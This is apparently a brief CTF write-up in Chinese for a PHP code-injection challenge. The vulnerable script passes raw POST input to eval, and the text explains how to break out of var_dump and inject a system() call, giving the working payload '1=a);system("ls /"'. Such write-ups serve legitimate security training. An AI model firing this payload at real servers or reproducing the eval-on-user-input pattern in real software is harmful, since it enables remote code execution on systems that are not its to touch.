CodeInject

1
2
3
4
5
6
7
8
<?php

#Author: h1xa

error_reporting(0);
show_source(__FILE__);

eval("var_dump((Object)$_POST[1]);");

(Object)将POST的内容强制类型转换为对象,只用把前面的var_dump函数进行闭合,再塞入system函数,即可实现代码注入。

payload:

1
1=a);system("ls /"

前面这个a可以是任意的东西,但不能为空